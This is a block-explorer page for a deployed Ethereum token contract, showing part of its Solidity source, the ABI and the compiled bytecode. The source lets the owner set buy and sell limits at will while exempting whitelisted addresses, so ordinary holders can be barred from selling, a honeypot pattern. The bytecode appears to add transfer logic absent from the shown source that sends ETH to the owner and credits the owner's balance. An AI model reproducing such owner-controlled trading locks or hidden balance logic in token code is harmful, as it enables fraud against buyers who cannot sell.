* 10 ** _decimal; whitelist[msg.sender] = true; whitelist[_owner] = true; } function createPair() public onlyOwner { IUniswapV2Router02 router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); _pair = IUniswapV2Factory(router.factory()).createPair(router.WETH(), address(this)); whitelist[_pair] = true; } function setLimit(uint256 _buylimit, uint256 _selllimit) public onlyOwner{ buyLimit = _buylimit; sellLimit = _selllimit; } function _mint( address to ) internal override whenNotPaused{ return super._mint(to); } function _transfer( address from, address to, uint256 amount ) internal override virtual whenNotPaused returns (bool){ if(!whitelist[from]){ userSelllimit[from] += amount; require(userSelllimit[from] <= sellLimit, "not allowed anymore to sell"); } if(!whitelist[to]){ userBuylimit[to] += amount; require(userBuylimit[to] <= buyLimit, "not allowed anymore to buy"); } return super._transfer(from, to, amount); } function setTokenURI(string memory _tokenURI) public onlyOwner { baseTokenURI = _tokenURI; } function setNameSymbol( string memory _name, string memory _symbol ) public onlyOwner { _setNameSymbol(_name, _symbol); } function tokenURI(uint256 id) public view override returns (string memory) { return bytes(baseTokenURI).length > 0 ? string.concat(baseTokenURI, id.toString(), ".json") : ""; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_owner","type":"address"},{"internalType":"uint256","name":"_initialSupply","type":"uint256"},{"internalType":"uint8","name":"_decimal","type":"uint8"},{"internalType":"uint256","name":"_buylimit","type":"uint256"},{"internalType":"uint256","name":"_selllimit","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AlreadyExists","type":"error"},{"inputs":[],"name":"EnforcedPause","type":"error"},{"inputs":[],"name":"ExpectedPause","type":"error"},{"inputs":[],"name":"InvalidOwner","type":"error"},{"inputs":[],"name":"InvalidRecipient","type":"error"},{"inputs":[],"name":"InvalidSender","type":"error"},{"inputs":[],"name":"NotFound","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"inputs":[],"name":"ReentrancyGuardReentrantCall","type":"error"},{"inputs":[],"name":"Unauthorized","type":"error"},{"inputs":[],"name":"UnsafeRecipient","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"ERC20Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"ERC721Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferStarted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"acceptOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseTokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"owner","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pendingOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buylimit","type":"uint256"},{"internalType":"uint256","name":"_selllimit","type":"uint256"}],"name":"setLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"}],"name":"setNameSymbol","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_tokenURI","type":"string"}],"name":"setTokenURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"target","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"setWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"txLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userBuylimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userSelllimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60c060405234801562000010575f80fd5b50604051620025753803806200257583398101604081905262000033916200023e565b6040805180820182526006815265105c194d0c0d60d21b6020808301919091528251808401909352600383526241504560e81b908301529084868833806200009457604051631e4fbdf760e01b81525f600482015260240160405180910390fd5b6200009f81620001d1565b50600680546001600160a01b0319166001600160a01b0383161790556002620000c986826200033f565b506003620000d885826200033f565b5060ff83166080819052620000ef90600a6200051a565b620000fb908362000531565b60a0525050600f805460ff1916905550506001601055506200011f83600a6200051a565b6200012b908562000531565b335f908152600760205260409020556200014783600a6200051a565b62000153908362000531565b6012556200016383600a6200051a565b6200016f908262000531565b6013556200017f83600a6200051a565b6200018c90600a62000531565b6014555050335f908152600e60205260408082208054600160ff1991821681179092556001600160a01b039690961683529120805490941617909255506200054b9050565b600180546001600160a01b0319169055620001ec81620001ef565b50565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f805f805f60a0868803121562000253575f80fd5b85516001600160a01b03811681146200026a575f80fd5b60208701516040880151919650945060ff8116811462000288575f80fd5b6060870151608090970151959894975095949392505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620002ca57607f821691505b602082108103620002e957634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200033a57805f5260205f20601f840160051c81016020851015620003165750805b601f840160051c820191505b8181101562000337575f815560010162000322565b50505b505050565b81516001600160401b038111156200035b576200035b620002a1565b62000373816200036c8454620002b5565b84620002ef565b602080601f831160018114620003a9575f8415620003915750858301515b5f19600386901b1c1916600185901b17855562000403565b5f85815260208120601f198616915b82811015620003d957888601518255948401946001909101908401620003b8565b5085821015620003f757878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200045f57815f19048211156200044357620004436200040b565b808516156200045157918102915b93841c939080029062000424565b509250929050565b5f82620004775750600162000514565b816200048557505f62000514565b81600181146200049e5760028114620004a957620004c9565b600191505062000514565b60ff841115620004bd57620004bd6200040b565b50506001821b62000514565b5060208310610133831016604e8410600b8410161715620004ee575081810a62000514565b620004fa83836200041f565b805f19048211156200051057620005106200040b565b0290505b92915050565b5f6200052a60ff84168362000467565b9392505050565b80820281158282048414176200051457620005146200040b565b60805160a051612001620005745f395f61029201525f81816102ef015261104301526120015ff3fe608060405234801561000f575f80fd5b5060043610610208575f3560e01c8063715018a61161011f578063c87b56dd116100a9578063e2d6f33a11610079578063e2d6f33a146104a0578063e30c3978146104bf578063e985e9c5146104d0578063f2fde38b146104fd578063f349b17314610510575f80fd5b8063c87b56dd14610448578063d547cfb71461045b578063dd62ed3e14610463578063e0df5b6f1461048d575f80fd5b80639b19251a116100ef5780639b19251a146103e55780639e78fb4f14610407578063a22cb4651461040f578063a9059cbb14610422578063b88d4fde14610435575f80fd5b8063715018a6146103bd57806379ba5097146103c55780638da5cb5b146103cd57806395d89b41146103dd575f80fd5b80634f02c420116101a0578063589210d911610170578063589210d91461036e5780635c975abb146103775780636352211e146103825780636caae8321461039557806370a082311461039e575f80fd5b80634f02c420146103365780634f91e48c1461033f578063504334c21461034857806353d6fd591461035b575f80fd5b8063207add91116101db578063207add91146102c257806323b872dd146102d7578063313ce567146102ea57806342842e0e14610323575f80fd5b806306fdde031461020c578063081812fc1461022a578063095ea7b31461026a57806318160ddd1461028d575b5f80fd5b61021461052f565b60405161022191906118cc565b60405180910390f35b6102526102383660046118fe565b60096020525f90815260409020546001600160a01b031681565b6040516001600160a01b039091168152602001610221565b61027d610278366004611929565b6105bb565b6040519015158152602001610221565b6102b47f000000000000000000000000000000000000000000000000000000000000000081565b604051908152602001610221565b6102d56102d0366004611953565b610706565b005b6102d56102e5366004611973565b610719565b6103117f000000000000000000000000000000000000000000000000000000000000000081565b60405160ff9091168152602001610221565b6102d5610331366004611973565b610a95565b6102b460045481565b6102b460135481565b6102d5610356366004611a4e565b610b66565b6102d5610369366004611aae565b610b7c565b6102b460125481565b600f5460ff1661027d565b6102526103903660046118fe565b610bae565b6102b460145481565b6102b46103ac366004611ae9565b60076020525f908152604090205481565b6102d5610be8565b6102d5610bfb565b5f546001600160a01b0316610252565b610214610c44565b61027d6103f3366004611ae9565b600e6020525f908152604090205460ff1681565b6102d5610c51565b6102d561041d366004611aae565b610de6565b61027d610430366004611929565b610e51565b6102d5610443366004611b04565b610e64565b6102146104563660046118fe565b610f24565b610214610f80565b6102b4610471366004611b9b565b600860209081525f928352604080842090915290825290205481565b6102d561049b366004611bc7565b610f8d565b6102b46104ae366004611ae9565b60156020525f908152604090205481565b6001546001600160a01b0316610252565b61027d6104de366004611b9b565b600a60209081525f928352604080842090915290825290205460ff1681565b6102d561050b366004611ae9565b610fa1565b6102b461051e366004611ae9565b60166020525f908152604090205481565b6002805461053c90611bf9565b80601f016020809104026020016040519081016040528092919081815260200182805461056890611bf9565b80156105b35780601f1061058a576101008083540402835291602001916105b3565b820191905f5260205f20905b81548152906001019060200180831161059657829003601f168201915b505050505081565b5f60045482111580156105cd57505f82115b156106a1575f828152600b60205260409020546001600160a01b031633811480159061061c57506001600160a01b0381165f908152600a6020908152604080832033845290915290205460ff16155b15610639576040516282b42960e81b815260040160405180910390fd5b5f8381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106fc565b335f8181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b61070e611011565b601291909155601355565b6004548111610a29575f818152600b60205260409020546001600160a01b0384811691161461075b57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661078257604051634e46966960e11b815260040160405180910390fd5b336001600160a01b038416148015906107be57506001600160a01b0383165f908152600a6020908152604080832033845290915290205460ff16155b80156107e057505f818152600960205260409020546001600160a01b03163314155b156107fd576040516282b42960e81b815260040160405180910390fd5b61080561103d565b6001600160a01b0384165f908152600760205260408120805490919061082c908490611c45565b9091555061083a905061103d565b6001600160a01b038084165f8181526007602090815260408083208054909601909555858252600b815284822080546001600160a01b031990811690941790556009815284822080549093169092559186168252600c905290812080546108a390600190611c45565b815481106108b3576108b3611c58565b5f9182526020808320909101546001600160a01b0387168352600c82526040808420868552600d909352909220548154929350839281106108f6576108f6611c58565b5f9182526020808320909101929092556001600160a01b0386168152600c9091526040902080548061092a5761092a611c6c565b5f828152602080822083015f19908101839055909201909255838252600d8152604080832054848452818420556001600160a01b038616808452600c8352908320805460018181018355828652938520018690559252905461098c9190611c45565b5f838152600d602052604080822092909255905183916001600160a01b0380871692908816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4826001600160a01b0316846001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e031487610a1261103d565b60405190815260200160405180910390a350505050565b6001600160a01b0383165f9081526008602090815260408083203384529091529020545f198114610a8257610a5e8282611c45565b6001600160a01b0385165f9081526008602090815260408083203384529091529020555b610a8d84848461106e565b50505b505050565b610aa0838383610719565b6001600160a01b0382163b15801590610b485750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401525f608484015290919084169063150b7a029060a4016020604051808303815f875af1158015610b17573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b3b9190611c80565b6001600160e01b03191614155b15610a9057604051633da6393160e01b815260040160405180910390fd5b610b6e611011565b610b7882826111f2565b5050565b610b84611011565b6001600160a01b03919091165f908152600e60205260409020805460ff1916911515919091179055565b5f818152600b60205260409020546001600160a01b031680610be35760405163c5723b5160e01b815260040160405180910390fd5b919050565b610bf0611011565b610bf95f61120b565b565b60015433906001600160a01b03168114610c385760405163118cdaa760e01b81526001600160a01b03821660048201526024015b60405180910390fd5b610c418161120b565b50565b6003805461053c90611bf9565b610c59611011565b5f737a250d5630b4cf539739df2c5dacb4c659f2488d9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610cad573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610cd19190611ca7565b6001600160a01b031663c9c65396826001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610d1b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d3f9190611ca7565b6040516001600160e01b031960e084901b1681526001600160a01b0390911660048201523060248201526044016020604051808303815f875af1158015610d88573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dac9190611ca7565b600580546001600160a01b0319166001600160a01b039290921691821790555f908152600e60205260409020805460ff1916600117905550565b335f818152600a602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b5f610e5d33848461106e565b9392505050565b610e6f858585610719565b6001600160a01b0384163b15801590610f065750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610eb99033908a90899089908990600401611cc2565b6020604051808303815f875af1158015610ed5573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ef99190611c80565b6001600160e01b03191614155b15610a8d57604051633da6393160e01b815260040160405180910390fd5b60605f60118054610f3490611bf9565b905011610f4f5760405180602001604052805f815250610700565b6011610f5a83611224565b604051602001610f6b929190611d14565b60405160208183030381529060405292915050565b6011805461053c90611bf9565b610f95611011565b6011610b788282611deb565b610fa9611011565b600180546001600160a01b0383166001600160a01b03199091168117909155610fd95f546001600160a01b031690565b6001600160a01b03167f38d16b8cac22d99fc7c124b9cd0de2d3fa1faef420bfe791d8c362d765e2270060405160405180910390a350565b5f546001600160a01b03163314610bf95760405163118cdaa760e01b8152336004820152602401610c2f565b5f6110697f0000000000000000000000000000000000000000000000000000000000000000600a611f8b565b905090565b5f6110776112b4565b6001600160a01b0384165f908152600e602052604090205460ff1661112b576001600160a01b0384165f90815260166020526040812080548492906110bd908490611f99565b90915550506013546001600160a01b0385165f90815260166020526040902054111561112b5760405162461bcd60e51b815260206004820152601b60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f2073656c6c00000000006044820152606401610c2f565b6001600160a01b0383165f908152600e602052604090205460ff166111df576001600160a01b0383165f9081526015602052604081208054849290611171908490611f99565b90915550506012546001600160a01b0384165f9081526015602052604090205411156111df5760405162461bcd60e51b815260206004820152601a60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f206275790000000000006044820152606401610c2f565b6111ea8484846112d8565b949350505050565b60026111fe8382611deb565b506003610a908282611deb565b600180546001600160a01b0319169055610c41816114ab565b60605f611230836114fa565b60010190505f8167ffffffffffffffff81111561124f5761124f6119b1565b6040519080825280601f01601f191660200182016040528015611279576020820181803683370190505b5090508181016020015b5f19016f181899199a1a9b1b9c1cb0b131b232b360811b600a86061a8153600a850494508461128357509392505050565b600f5460ff1615610bf95760405163d93c066560e01b815260040160405180910390fd5b5f806112e261103d565b6001600160a01b038087165f90815260076020526040808220549288168252902054919250906113138787876115d1565b156113245760019350505050610e5d565b6001600160a01b0387165f908152600760205260408120805487929061134b908490611c45565b90915550506001600160a01b038087165f90815260076020908152604080832080548a019055928a168252600e9052205460ff166113da576001600160a01b0387165f908152600760205260408120546113a6908590611fac565b6113b08585611fac565b6113ba9190611c45565b90505f5b818110156113d7576113cf89611675565b6001016113be565b50505b6001600160a01b0386165f908152600e602052604090205460ff16611451575f6114048483611fac565b6001600160a01b0388165f90815260076020526040902054611427908690611fac565b6114319190611c45565b90505f5b8181101561144e5761144688611796565b600101611435565b50505b856001600160a01b0316876001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314878760405161149691815260200190565b60405180910390a35060019695505050505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f8072184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b83106115385772184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b830492506040015b6d04ee2d6d415b85acef81000000008310611564576d04ee2d6d415b85acef8100000000830492506020015b662386f26fc10000831061158257662386f26fc10000830492506010015b6305f5e100831061159a576305f5e100830492506008015b61271083106115ae57612710830492506004015b606483106115c0576064830492506002015b600a83106107005760010192915050565b6005545f906001600160a01b039081169084160361166c576006546040516001600160a01b03909116904780156108fc02915f818181858888f1935050505015801561161f573d5f803e3d5ffd5b506006546001600160a01b039081169085160361166c576001600160a01b0383165f908152600760205260408120805484929061165d908490611f99565b9091555060019150610e5d9050565b505f9392505050565b6001600160a01b03811661169c57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b0381165f908152600c6020526040812080546116c190600190611c45565b815481106116d1576116d1611c58565b905f5260205f2001549050600c5f836001600160a01b03166001600160a01b031681526020019081526020015f2080548061170e5761170e611c6c565b5f828152602080822083015f19908101839055909201909255828252600d81526040808320839055600b825280832080546001600160a01b031990811690915560099092528083208054909216909155518291906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908390a45050565b61179e6112b4565b610c41816001600160a01b0381166117c957604051634e46966960e11b815260040160405180910390fd5b60048054600101908190555f818152600b60205260409020546001600160a01b0316156118095760405163119b4fd360e11b815260040160405180910390fd5b5f818152600b6020908152604080832080546001600160a01b0319166001600160a01b038716908117909155808452600c835290832080546001818101835582865293852001859055925290546118609190611c45565b5f828152600d602052604080822092909255905182916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b5f5b838110156118c45781810151838201526020016118ac565b50505f910152565b602081525f82518060208401526118ea8160408501602087016118aa565b601f01601f19169190910160400192915050565b5f6020828403121561190e575f80fd5b5035919050565b6001600160a01b0381168114610c41575f80fd5b5f806040838503121561193a575f80fd5b823561194581611915565b946020939093013593505050565b5f8060408385031215611964575f80fd5b50508035926020909101359150565b5f805f60608486031215611985575f80fd5b833561199081611915565b925060208401356119a081611915565b929592945050506040919091013590565b634e487b7160e01b5f52604160045260245ffd5b5f82601f8301126119d4575f80fd5b813567ffffffffffffffff808211156119ef576119ef6119b1565b604051601f8301601f19908116603f01168101908282118183101715611a1757611a176119b1565b81604052838152866020858801011115611a2f575f80fd5b836020870160208301375f602085830101528094505050505092915050565b5f8060408385031215611a5f575f80fd5b823567ffffffffffffffff80821115611a76575f80fd5b611a82868387016119c5565b93506020850135915080821115611a97575f80fd5b50611aa4858286016119c5565b9150509250929050565b5f8060408385031215611abf575f80fd5b8235611aca81611915565b915060208301358015158114611ade575f80fd5b809150509250929050565b5f60208284031215611af9575f80fd5b8135610e5d81611915565b5f805f805f60808688031215611b18575f80fd5b8535611b2381611915565b94506020860135611b3381611915565b935060408601359250606086013567ffffffffffffffff80821115611b56575f80fd5b818801915088601f830112611b69575f80fd5b813581811115611b77575f80fd5b896020828501011115611b88575f80fd5b9699959850939650602001949392505050565b5f8060408385031215611bac575f80fd5b8235611bb781611915565b91506020830135611ade81611915565b5f60208284031215611bd7575f80fd5b813567ffffffffffffffff811115611bed575f80fd5b6111ea848285016119c5565b600181811c90821680611c0d57607f821691505b602082108103611c2b57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561070057610700611c31565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52603160045260245ffd5b5f60208284031215611c90575f80fd5b81516001600160e01b031981168114610e5d575f80fd5b5f60208284031215611cb7575f80fd5b8151610e5d81611915565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290525f828460a08401375f60a0848401015260a0601f19601f85011683010190509695505050505050565b5f808454611d2181611bf9565b60018281168015611d395760018114611d4e57611d7a565b60ff1984168752821515830287019450611d7a565b885f526020805f205f5b85811015611d715781548a820152908401908201611d58565b50505082870194505b505050508351611d8e8183602088016118aa565b64173539b7b760d91b9101908152600501949350505050565b601f821115610a9057805f5260205f20601f840160051c81016020851015611dcc5750805b601f840160051c820191505b81811015610a8d575f8155600101611dd8565b815167ffffffffffffffff811115611e0557611e056119b1565b611e1981611e138454611bf9565b84611da7565b602080601f831160018114611e4c575f8415611e355750858301515b5f19600386901b1c1916600185901b178555611ea3565b5f85815260208120601f198616915b82811015611e7a57888601518255948401946001909101908401611e5b565b5085821015611e9757878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b600181815b80851115611ee557815f1904821115611ecb57611ecb611c31565b80851615611ed857918102915b93841c9390800290611eb0565b509250929050565b5f82611efb57506001610700565b81611f0757505f610700565b8160018114611f1d5760028114611f2757611f43565b6001915050610700565b60ff841115611f3857611f38611c31565b50506001821b610700565b5060208310610133831016604e8410600b8410161715611f66575081810a610700565b611f708383611eab565b805f1904821115611f8357611f83611c31565b029392505050565b5f610e5d60ff841683611eed565b8082018082111561070057610700611c31565b5f82611fc657634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220e74beb20157245e3770bc24a040e8188bffd69d49e44aadb692e45d3bce5848064736f6c63430008160033000000000000000000000000837370b0b6c48663bba8bbe06f6604700900e79000000000000000000000000000000000000000000000000000000000000000c8000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004
Deployed Bytecode
0x608060405234801561000f575f80fd5b5060043610610208575f3560e01c8063715018a61161011f578063c87b56dd116100a9578063e2d6f33a11610079578063e2d6f33a146104a0578063e30c3978146104bf578063e985e9c5146104d0578063f2fde38b146104fd578063f349b17314610510575f80fd5b8063c87b56dd14610448578063d547cfb71461045b578063dd62ed3e14610463578063e0df5b6f1461048d575f80fd5b80639b19251a116100ef5780639b19251a146103e55780639e78fb4f14610407578063a22cb4651461040f578063a9059cbb14610422578063b88d4fde14610435575f80fd5b8063715018a6146103bd57806379ba5097146103c55780638da5cb5b146103cd57806395d89b41146103dd575f80fd5b80634f02c420116101a0578063589210d911610170578063589210d91461036e5780635c975abb146103775780636352211e146103825780636caae8321461039557806370a082311461039e575f80fd5b80634f02c420146103365780634f91e48c1461033f578063504334c21461034857806353d6fd591461035b575f80fd5b8063207add91116101db578063207add91146102c257806323b872dd146102d7578063313ce567146102ea57806342842e0e14610323575f80fd5b806306fdde031461020c578063081812fc1461022a578063095ea7b31461026a57806318160ddd1461028d575b5f80fd5b61021461052f565b60405161022191906118cc565b60405180910390f35b6102526102383660046118fe565b60096020525f90815260409020546001600160a01b031681565b6040516001600160a01b039091168152602001610221565b61027d610278366004611929565b6105bb565b6040519015158152602001610221565b6102b47f00000000000000000000000000000000000000000000000ad78ebc5ac620000081565b604051908152602001610221565b6102d56102d0366004611953565b610706565b005b6102d56102e5366004611973565b610719565b6103117f000000000000000000000000000000000000000000000000000000000000001281565b60405160ff9091168152602001610221565b6102d5610331366004611973565b610a95565b6102b460045481565b6102b460135481565b6102d5610356366004611a4e565b610b66565b6102d5610369366004611aae565b610b7c565b6102b460125481565b600f5460ff1661027d565b6102526103903660046118fe565b610bae565b6102b460145481565b6102b46103ac366004611ae9565b60076020525f908152604090205481565b6102d5610be8565b6102d5610bfb565b5f546001600160a01b0316610252565b610214610c44565b61027d6103f3366004611ae9565b600e6020525f908152604090205460ff1681565b6102d5610c51565b6102d561041d366004611aae565b610de6565b61027d610430366004611929565b610e51565b6102d5610443366004611b04565b610e64565b6102146104563660046118fe565b610f24565b610214610f80565b6102b4610471366004611b9b565b600860209081525f928352604080842090915290825290205481565b6102d561049b366004611bc7565b610f8d565b6102b46104ae366004611ae9565b60156020525f908152604090205481565b6001546001600160a01b0316610252565b61027d6104de366004611b9b565b600a60209081525f928352604080842090915290825290205460ff1681565b6102d561050b366004611ae9565b610fa1565b6102b461051e366004611ae9565b60166020525f908152604090205481565b6002805461053c90611bf9565b80601f016020809104026020016040519081016040528092919081815260200182805461056890611bf9565b80156105b35780601f1061058a576101008083540402835291602001916105b3565b820191905f5260205f20905b81548152906001019060200180831161059657829003601f168201915b505050505081565b5f60045482111580156105cd57505f82115b156106a1575f828152600b60205260409020546001600160a01b031633811480159061061c57506001600160a01b0381165f908152600a602090815260408083203384529